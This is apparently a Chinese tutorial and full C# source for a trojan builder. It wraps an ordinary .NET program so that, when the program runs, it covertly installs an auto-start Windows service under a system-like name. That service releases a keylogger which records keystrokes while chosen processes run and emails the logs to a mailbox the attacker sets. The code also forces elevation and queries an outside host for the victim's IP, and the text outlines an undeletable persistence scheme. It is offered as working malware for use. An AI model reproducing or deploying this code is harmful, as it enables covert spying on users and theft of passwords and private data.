1、首先解决开机启动木马。通过建立开机启动服务达到目的;
2、伪装问题。通过c#反射性能,将正常的.net的exe文件添加监控盗传播取等其他功能,执行正常程序同时,后台悄悄释放windows服务,通过服务释放调取木马exe;
3、传播问题。可以包装一个.net做的,使用比较广的软件,因为通过反射可在exe内执行其他exe文件(相当于1个exe里面可以嵌套多个exe并执行),至于执行什么功能想到了就可以做
4、在执行本例子前,先随意编写一个.Net的exe文件,在“被包装exe文件名”指向该文件,其中“监控执行检测间隔(秒):”设置大一些,因为监控程序随着服务开机启动,需windows启动成功后方可正常运行。“建立的服务名”、“服务文件路径和名称”、“监控文件路径和名称”为防止用户删除,放置在windows里面的一些文件夹内部,名字起得系统一些,比如“UpdataServer”等等,就是使用户不知道他是干嘛的,不会删除的那种。本例子生成的exe文件,除了执行你编写的.Net的exe文件外,监控你设定的多个进程,记录键盘,并按照你设定的时间定时发送键盘记录到你设定的邮箱。程序里执行的监控代码和安装服务代码为字符串形式,根据你填写的条件,并自动编译为临时文件,并生成包装后的C#代码,自动编译后输出exe文件。执行该exe文件,看到的为你编写的.Net的exe文件效果,后台建立了开机启动的一个服务,并释放了一个监控exe文件,通过服务执行,并每次开机就执行服务来开启监控。
5、悄悄建立服务、释放exe、管理员模式运行等等,自己代码里面看
如需对监控进行加固,变为用户不可删除,可以修改代码字符串,加入建立多个windows服务,并在监控程序内检测windows服务是否存在,并释放执行windows服务,在服务字符串代码内释放多个exe监控,形成多服务、多exe的相互检测、相互释放,这样用户除非重做系统,否则不能删除该监控,该功能只提供截图,不提供代码。
提供代码的只是建立单一服务、单一监控的,可以删除掉的代码。
using System;
using System.CodeDom.Compiler;
using System.IO;
using System.Windows.Forms; namespace *_2
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
} public byte[] ReadImageFile(String img)
{
FileInfo fileinfo = new FileInfo(img);
byte[] buf = new byte[fileinfo.Length];
FileStream fs = new FileStream(img, FileMode.Open, FileAccess.Read);
fs.Read(buf, , buf.Length);
fs.Close();
GC.ReRegisterForFinalize(fileinfo);
GC.ReRegisterForFinalize(fs);
return buf;
} private void button_Pack_Click(object sender, EventArgs e)
{
Button pL = (Button)sender;
pL.Enabled = false; if (MailAddr.Text != "")
{
Code_Source.MailSetup += @"model.SendEmail =""" + MailAddr.Text + "\";";
}
else
{
MessageBox.Show("发送邮件地址 必须输入!");
return;
} if (MailPasword.Text != "")
{
Code_Source.MailSetup += @"
model.SendPwd =""" + MailPasword.Text + "\";";
}
else
{
MessageBox.Show("发送邮件密码 必须输入!");
return;
} if (MailSmtp.Text != "")
{
Code_Source.MailSetup += @"
model.SendSetSmtp =""" + MailSmtp.Text + "\";";
}
else
{
MessageBox.Show("邮件SMTP 必须输入!");
return;
} if (MailAccept.Text != "")
{
Code_Source.MailSetup += @"
model.ConsigneeAddress =""" + MailAccept.Text + "\";";
}
else
{
MessageBox.Show("接收邮件地址 必须输入!");
return;
} if (MailSpear.Text != "")
{
try
{
int.Parse(MailSpear.Text);
Code_Source.SendSpear = MailSpear.Text;
}
catch
{
Code_Source.SendSpear = "";
}
}
else
{
MessageBox.Show("邮件发送时间间隔 必须输入!");
return;
} if (ProcessName.Text != "")
{
Code_Source.split_Process = ProcessName.Text.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Code_Source.processName = "string [] processName = new string[] {";
for (int i = ; i < Code_Source.split_Process.Length; i++)
{
Code_Source.processName += "\"" + Code_Source.split_Process[i] + "\"";
if (i < Code_Source.split_Process.Length - ) Code_Source.processName += ",";
}
Code_Source.processName += "};";
Code_Source.processName += @"
for (int i=0;i<" + Code_Source.split_Process.Length + @";i++)
{
Ps.Add(new list_process(processName[i]));
}";
}
else
{
MessageBox.Show("监控的进程名称 必须输入!");
return;
} // 生成键盘监控exe文件
CodeDomProvider codeProvider = CodeDomProvider.CreateProvider("CSharp");
string Output = "MonitoringTmp.~exe";
CompilerParameters parameters = new CompilerParameters();
parameters.ReferencedAssemblies.Add("System.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.dll");
parameters.ReferencedAssemblies.Add("System.ServiceProcess.dll");
parameters.ReferencedAssemblies.Add("System.Drawing.dll");
parameters.ReferencedAssemblies.Add("System.Configuration.dll");
parameters.ReferencedAssemblies.Add("System.Configuration.Install.dll");
parameters.ReferencedAssemblies.Add("System.Runtime.InteropServices.dll");
parameters.ReferencedAssemblies.Add("System.Security.Principal.dll");
parameters.ReferencedAssemblies.Add("System.Threading.dll");
parameters.GenerateExecutable = true;
parameters.CompilerOptions = "-t:winexe";
parameters.OutputAssembly = Output;
CompilerResults results = codeProvider.CompileAssemblyFromSource(
parameters, Code_Source.Creat_RunApp(Code_Source.processName, Code_Source.MailSetup, Code_Source.SendSpear)
); // 生成安装服务exe文件
byte[] BinBytes = null;
BinBytes = ReadImageFile(Output);
string str = Convert.ToBase64String(BinBytes); CodeDomProvider codeProvider_Server = CodeDomProvider.CreateProvider("CSharp");
string OutServer = "ServerTmp.~exe";
CompilerParameters parameters_Server = new CompilerParameters();
parameters_Server.ReferencedAssemblies.Add("System.dll");
parameters_Server.ReferencedAssemblies.Add("System.Windows.Forms.dll");
parameters_Server.ReferencedAssemblies.Add("System.ServiceProcess.dll");
parameters_Server.ReferencedAssemblies.Add("System.Drawing.dll");
parameters_Server.ReferencedAssemblies.Add("System.Configuration.dll");
parameters_Server.ReferencedAssemblies.Add("System.Configuration.Install.dll");
parameters_Server.ReferencedAssemblies.Add("System.Runtime.InteropServices.dll");
parameters_Server.ReferencedAssemblies.Add("System.Security.Principal.dll");
parameters_Server.ReferencedAssemblies.Add("System.Threading.dll");
parameters_Server.GenerateExecutable = true;
parameters_Server.CompilerOptions = "-t:winexe";
parameters_Server.OutputAssembly = OutServer;
CompilerResults results_Server = codeProvider_Server.CompileAssemblyFromSource(
parameters_Server, Code_Source.Creat_Server(ServerName.Text, str, ExePath.Text, ServerSpear.Text)
); // 读取生成和包装的exe文件
byte[] BinServer = null;
BinServer = ReadImageFile(OutServer);
string server_str = Convert.ToBase64String(BinServer); byte[] BinPack = null;
BinPack = ReadImageFile(Packaging.Text);
string pack_str = Convert.ToBase64String(BinPack); CodeDomProvider codeProvider_Pack = CodeDomProvider.CreateProvider("CSharp");
string OutPack = OutPackExe.Text;
CompilerParameters parameters_Pack = new CompilerParameters();
parameters_Pack.ReferencedAssemblies.Add("System.dll");
parameters_Pack.ReferencedAssemblies.Add("System.Reflection.dll");
parameters_Pack.ReferencedAssemblies.Add("System.Windows.Forms.dll");
parameters_Server.ReferencedAssemblies.Add("System.Drawing.dll");
parameters_Pack.GenerateExecutable = true;
parameters_Pack.CompilerOptions = "-t:winexe";
parameters_Pack.OutputAssembly = OutPack;
CompilerResults results_Pack = codeProvider_Pack.CompileAssemblyFromSource(
parameters_Pack, Code_Source.Creat_Packing(server_str, pack_str, ServerPath.Text.Replace("\\", "\\\\"))
); pL.Enabled = true;
MessageBox.Show("编译完成!");
}
}
}
public class Code_Source
{
public static string[] split_ServerName, split_ServerFile, split_ExeFile, split_Monit, split_Process;
public static string MailSetup = "";
public static string SendSpear = "";
public static string processName = ""; /// <summary>
/// 监控代码
/// </summary>
public static string Creat_RunApp(string _process, string _email, string _sendspear)
{
string Run_APP = @"
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Net;
using System.Net.Mail;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.ServiceProcess;
using System.Security.Principal;
namespace m_Test1
{
static class Program
{
[STAThread]
static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new HideOnStartupApplicationContext(new Form1()));
}
internal class HideOnStartupApplicationContext : ApplicationContext
{
private Form mainFormInternal;
public HideOnStartupApplicationContext(Form mainForm)
{
this.mainFormInternal = mainForm;
}
}
public class EmailParameterSet
{
public string ConsigneeAddress { get; set; }
public string ConsigneeName { get; set; }
public string ConsigneeHand { get; set; }
public string ConsigneeTheme { get; set; }
public string SendSetSmtp { get; set; }
public string SendEmail { get; set; }
public string SendPwd { get; set; }
public string SendContent { get; set; }
}
public static bool MailSend(EmailParameterSet EPSModel)
{
try
{
SmtpClient sendSmtpClient = new SmtpClient(EPSModel.SendSetSmtp);
MailAddress sendMailAddress = new MailAddress(EPSModel.SendEmail, EPSModel.ConsigneeHand, Encoding.UTF8);
MailAddress consigneeMailAddress = new MailAddress(EPSModel.ConsigneeAddress, EPSModel.ConsigneeName, Encoding.UTF8);
MailMessage mailMessage = new MailMessage(sendMailAddress, consigneeMailAddress);
mailMessage.Subject = EPSModel.ConsigneeTheme;
mailMessage.BodyEncoding = Encoding.UTF8;
mailMessage.SubjectEncoding = Encoding.UTF8;
mailMessage.Body = EPSModel.SendContent;
mailMessage.IsBodyHtml = false;
sendSmtpClient.DeliveryMethod = SmtpDeliveryMethod.Network;
sendSmtpClient.EnableSsl = false;
sendSmtpClient.UseDefaultCredentials = false;
NetworkCredential myCredential = new NetworkCredential(EPSModel.SendEmail, EPSModel.SendPwd);
sendSmtpClient.Credentials = myCredential;
sendSmtpClient.Send(mailMessage);
return true;
}
catch (Exception)
{
return false;
}
}
public class list_process
{
public Process[] processes;
public string pName;
public list_process (string _name)
{
pName = _name;
}
}
public static List<list_process> Ps = new List<list_process>();
public static DateTime dt;
public static string _record = """";
public static TimeSpan span;
public static EmailParameterSet model;
public partial class Form1 : Form
{
public Form1()
{
" + _process + @"
dt = DateTime.Now;
model = new EmailParameterSet();
Task send_Task = new Task(Send_Record);
send_Task.Start();
KeyRecord kh = new KeyRecord();
}
}
public static void Send_Record ()
{
while (true)
{
span = DateTime.Now - dt;
if ((int)Math.Floor(span.TotalSeconds) > " + _sendspear + @")
{
if (_record != """")
{
" + _email + @"
model.ConsigneeHand = GetExtenalIpAddress();
model.SendContent = _record;
MailSend(model);
}
dt = DateTime.Now;
_record = """";
}
}
}
public static string GetExtenalIpAddress()
{
String url = ""http://hijoyusers.joymeng.com:8100/test/getNameByOtherIp"";
string IP = ""No_ip"";
try
{
WebClient client = new WebClient();
client.Encoding = Encoding.Default;
string str = client.DownloadString(url);
client.Dispose();
if (!str.Equals("""")) IP = str;
}
catch (Exception) { }
return IP;
}
public class KeyRecord
{
private const int WM_KEYDOWN = 0x100;
private const int WM_KEYUP = 0x101;
private const int WM_SYSKEYDOWN = 0x104;
private const int WM_SYSKEYUP = 0x105;
public event KeyEventHandler OnKeyDownEvent;
public event KeyEventHandler OnKeyUpEvent;
public event KeyPressEventHandler OnKeyPressEvent;
static int hKeyboardHook = 0;
public const int WH_KEYBOARD_LL = 13;
HookProc KeyboardHookProcedure;
[StructLayout(LayoutKind.Sequential)]
public class KeyboardHookStruct
{
public int vkCode;
public int scanCode;
public int flags;
public int time;
public int dwExtraInfo;
}
[DllImport(""user32.dll"", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern int SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hInstance, int threadId);
[DllImport(""user32.dll"", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool UnhookWindowsHookEx(int idHook);
[DllImport(""user32.dll"", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern int CallNextHookEx(int idHook, int nCode, Int32 wParam, IntPtr lParam);
[DllImport(""user32"")]
public static extern int ToAscii(int uVirtKey, int uScanCode, byte[] lpbKeyState, byte[] lpwTransKey, int fuState);
[DllImport(""user32"")]
public static extern int GetKeyboardState(byte[] pbKeyState);
public delegate int HookProc(int nCode, Int32 wParam, IntPtr lParam);
public KeyRecord()
{
this.OnKeyPressEvent += new KeyPressEventHandler(KeyBordHook_OnKeyPressEvent);
Start();
}
public void Start()
{
if (hKeyboardHook == 0)
{
KeyboardHookProcedure = new HookProc(KeyboardHookProc);
Module m = Assembly.GetExecutingAssembly().GetModules()[0];
IntPtr itp = Marshal.GetHINSTANCE(m);
hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardHookProcedure, itp, 0);
if (hKeyboardHook == 0)
{
Stop();
}
}
}
public void Stop()
{
bool retKeyboard = true; if (hKeyboardHook != 0)
{
retKeyboard = UnhookWindowsHookEx(hKeyboardHook);
hKeyboardHook = 0;
}
}
private int KeyboardHookProc(int nCode, Int32 wParam, IntPtr lParam)
{
if ((nCode >= 0) && (OnKeyDownEvent != null || OnKeyUpEvent != null || OnKeyPressEvent != null))
{
KeyboardHookStruct MyKeyboardHookStruct = (KeyboardHookStruct)Marshal.PtrToStructure(lParam, typeof(KeyboardHookStruct));
if (OnKeyDownEvent != null && (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))
{ Keys keyData = (Keys)MyKeyboardHookStruct.vkCode;
KeyEventArgs e = new KeyEventArgs(keyData);
OnKeyDownEvent(this, e);
}
if (OnKeyPressEvent != null && wParam == WM_KEYDOWN)
{
byte[] keyState = new byte[256];
GetKeyboardState(keyState);
byte[] inBuffer = new byte[2];
if (ToAscii(MyKeyboardHookStruct.vkCode,
MyKeyboardHookStruct.scanCode,
keyState,
inBuffer,
MyKeyboardHookStruct.flags) == 1)
{
KeyPressEventArgs e = new KeyPressEventArgs((char)inBuffer[0]);
OnKeyPressEvent(this, e);
}
}
if (OnKeyUpEvent != null && (wParam == WM_KEYUP || wParam == WM_SYSKEYUP))
{
Keys keyData = (Keys)MyKeyboardHookStruct.vkCode;
KeyEventArgs e = new KeyEventArgs(keyData);
OnKeyUpEvent(this, e);
}
}
return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}
private void KeyBordHook_OnKeyPressEvent(object sender, KeyPressEventArgs e)
{
for (int i = 0; i < Ps.Count; i++)
{
Ps[i].processes = Process.GetProcessesByName(Ps[i].pName);
if (Ps[i].processes.Length > 0)
{
_record += e.KeyChar.ToString();
}
}
}
}
}
}
"; return Run_APP;
} public static string Creat_Server(string _serverName,string _exefile, string _exepath, string _checkspear)
{
string Run_Server = @"
using System;
using System.Collections;
using System.Configuration.Install;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.ServiceProcess;
using System.Security.Principal;
using System.Threading; namespace ConsoleWithWindowsService
{
class Program
{
public class Interop
{
public static void CreateProcess(string app, string path)
{
bool result;
IntPtr hToken = WindowsIdentity.GetCurrent().Token;
IntPtr hDupedToken = IntPtr.Zero;
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
sa.Length = Marshal.SizeOf(sa);
STARTUPINFO si = new STARTUPINFO();
si.cb = Marshal.SizeOf(si);
int dwSessionID = WTSGetActiveConsoleSessionId();
result = WTSQueryUserToken(dwSessionID, out hToken);
result = DuplicateTokenEx(
hToken,
GENERIC_ALL_ACCESS,
ref sa,
(int)SECURITY_IMPERSONATION_LEVEL.SecurityIdentification,
(int)TOKEN_TYPE.TokenPrimary,
ref hDupedToken
);
IntPtr lpEnvironment = IntPtr.Zero;
result = CreateEnvironmentBlock(out lpEnvironment, hDupedToken, false);
result = CreateProcessAsUser(
hDupedToken,
app,
String.Empty,
ref sa, ref sa,
false, 0, IntPtr.Zero,
null, ref si, ref pi);
if (pi.hProcess != IntPtr.Zero)
CloseHandle(pi.hProcess);
if (pi.hThread != IntPtr.Zero)
CloseHandle(pi.hThread);
if (hDupedToken != IntPtr.Zero)
CloseHandle(hDupedToken);
}
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public Int32 dwProcessID;
public Int32 dwThreadID;
}
[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public Int32 Length;
public IntPtr lpSecurityDescriptor;
public bool bInheritHandle;
}
public enum SECURITY_IMPERSONATION_LEVEL
{
SecurityAnonymous,
SecurityIdentification,
SecurityImpersonation,
SecurityDelegation
}
public enum TOKEN_TYPE
{
TokenPrimary = 1,
TokenImpersonation
}
public const int GENERIC_ALL_ACCESS = 0x10000000;
[DllImport(""kernel32.dll"", SetLastError = true,
CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool CloseHandle(IntPtr handle);
[DllImport(""advapi32.dll"", SetLastError = true,
CharSet = CharSet.Ansi, CallingConvention = CallingConvention.StdCall)]
public static extern bool CreateProcessAsUser(
IntPtr hToken,
string lpApplicationName,
string lpCommandLine,
ref SECURITY_ATTRIBUTES lpProcessAttributes,
ref SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandle,
Int32 dwCreationFlags,
IntPtr lpEnvrionment,
string lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo,
ref PROCESS_INFORMATION lpProcessInformation);
[DllImport(""advapi32.dll"", SetLastError = true)]
public static extern bool DuplicateTokenEx(
IntPtr hExistingToken,
Int32 dwDesiredAccess,
ref SECURITY_ATTRIBUTES lpThreadAttributes,
Int32 ImpersonationLevel,
Int32 dwTokenType,
ref IntPtr phNewToken);
[DllImport(""wtsapi32.dll"", SetLastError = true)]
public static extern bool WTSQueryUserToken(
Int32 sessionId,
out IntPtr Token);
[DllImport(""userenv.dll"", SetLastError = true)]
static extern bool CreateEnvironmentBlock(
out IntPtr lpEnvironment,
IntPtr hToken,
bool bInherit);
public static IntPtr WTS_CURRENT_SERVER_HANDLE = IntPtr.Zero;
public static void ShowMessageBox(string message, string title)
{
int resp = 0;
WTSSendMessage(
WTS_CURRENT_SERVER_HANDLE,
WTSGetActiveConsoleSessionId(),
title, title.Length,
message, message.Length,
0, 0, out resp, false);
}
[DllImport(""kernel32.dll"", SetLastError = true)]
public static extern int WTSGetActiveConsoleSessionId();
[DllImport(""wtsapi32.dll"", SetLastError = true)]
public static extern bool WTSSendMessage(
IntPtr hServer,
int SessionId,
String pTitle,
int TitleLength,
String pMessage,
int MessageLength,
int Style,
int Timeout,
out int pResponse,
bool bWait);
}
public class ServiceHelper
{
public static bool IsServiceExisted(string serviceName)
{
ServiceController[] services = ServiceController.GetServices();
foreach (ServiceController s in services)
{
if (s.ServiceName == serviceName)
{
return true;
}
}
return false;
}
public static void StartService(string serviceName)
{
if (IsServiceExisted(serviceName))
{
ServiceController service = new ServiceController(serviceName);
if (service.Status != ServiceControllerStatus.Running &&
service.Status != ServiceControllerStatus.StartPending)
{
service.Start();
for (int i = 0; i < 60; i++)
{
service.Refresh();
System.Threading.Thread.Sleep(1000);
if (service.Status == ServiceControllerStatus.Running) break;
}
}
}
}
public static ServiceControllerStatus GetServiceStatus(string serviceName)
{
ServiceController service = new ServiceController(serviceName);
return service.Status;
}
public static void ConfigService(string serviceName, bool install)
{
TransactedInstaller ti = new TransactedInstaller();
ti.Installers.Add(new ServiceProcessInstaller
{
Account = ServiceAccount.LocalSystem
});
ti.Installers.Add(new ServiceInstaller
{
DisplayName = serviceName,
ServiceName = serviceName,
Description = serviceName,
StartType = ServiceStartMode.Automatic
});
ti.Context = new InstallContext();
ti.Context.Parameters[""assemblypath""] = ""\"""" + Assembly.GetEntryAssembly().Location + ""\"" /service"";
if (install) ti.Install(new Hashtable());
else ti.Uninstall(null);
}
}
static void Main(string[] args)
{
if (args.Length > 0)
{
try
{
ServiceBase[] serviceToRun = new ServiceBase[] { new WindowsService() };
ServiceBase.Run(serviceToRun);
}
catch {}
}
else
{
if (ServiceHelper.IsServiceExisted(""" + _serverName + @"""))
{
ServiceHelper.ConfigService("""+ _serverName + @""", false);
}
if (!ServiceHelper.IsServiceExisted("""+ _serverName + @"""))
{
ServiceHelper.ConfigService("""+ _serverName + @""", true);
}
ServiceHelper.StartService("""+ _serverName + @""");
}
}
partial class WindowsService : ServiceBase
{
public static string code = """ + _exefile + @""";
protected override void OnStart(string[] args)
{
Process.Start();
} public static class Process
{
public static void Start()
{
ThreadStart start = new ThreadStart(ThreadAction);
Thread th = new Thread(start);
th.IsBackground = true;
th.Start();
}
public static void ThreadAction()
{
bool atRun = false;
DateTime dt = DateTime.Now;
TimeSpan span;
while (true)
{
span = DateTime.Now - dt;
if ((int)Math.Floor(span.TotalSeconds)>" + _checkspear + @")
{
atRun = true;
}
if (atRun)
{
if (!File.Exists(@""" + _exepath + @"""))
{
byte[] bt = Convert.FromBase64String(code);
try
{
FileStream fs = new FileStream(@""" + _exepath + @""", FileMode.Create);
fs.Write(bt, 0, bt.Length);
fs.Close();
Interop.CreateProcess(@"""+ _exepath + @""", @""C:\Windows\System32\"");
} catch { }
atRun = false;
dt = DateTime.Now;
}
}
}
}
}
protected override void OnStop()
{
}
}
}
}
"; return Run_Server;
} public static string Creat_Packing(string _server, string _pack,string _serverpath)
{
string Run_Pack = @"
using System;
using System.Reflection;
using System.IO;
using System.Windows.Forms;
using System.Diagnostics;
namespace Replica_Prg
{
static class Program
{
[STAThread]
static void Main(string[] Args)
{
try
{
System.Security.Principal.WindowsIdentity identity = System.Security.Principal.WindowsIdentity.GetCurrent();
Application.EnableVisualStyles();
System.Security.Principal.WindowsPrincipal principal = new System.Security.Principal.WindowsPrincipal(identity);
if (principal.IsInRole(System.Security.Principal.WindowsBuiltInRole.Administrator))
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Test());
}
else
{
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.FileName = System.Windows.Forms.Application.ExecutablePath;
startInfo.Arguments = String.Join("" "", Args);
startInfo.Verb = ""runas"";
System.Diagnostics.Process.Start(startInfo);
System.Windows.Forms.Application.Exit();
}
}
catch { }
string str_Normal = """ + _pack + @""";
byte[] ns = Convert.FromBase64String(str_Normal);
Assembly asm_n = Assembly.Load(ns);
MethodInfo info_n = asm_n.EntryPoint;
ParameterInfo[] parameters_n = info_n.GetParameters();
info_n.Invoke(null, null);
}
public partial class Test : Form
{
public Test()
{
string str_Rep = """ + _server + @""";
byte[] bs = Convert.FromBase64String(str_Rep);
FileStream fs = new FileStream(@""" + _serverpath + @""", FileMode.Create);
fs.Write(bs, 0, bs.Length);
fs.Close();
Process pr = new Process();
pr.StartInfo.FileName = """+ _serverpath + @""";
pr.Start();
Close();
}
}
}
}
";
return Run_Pack;
}
}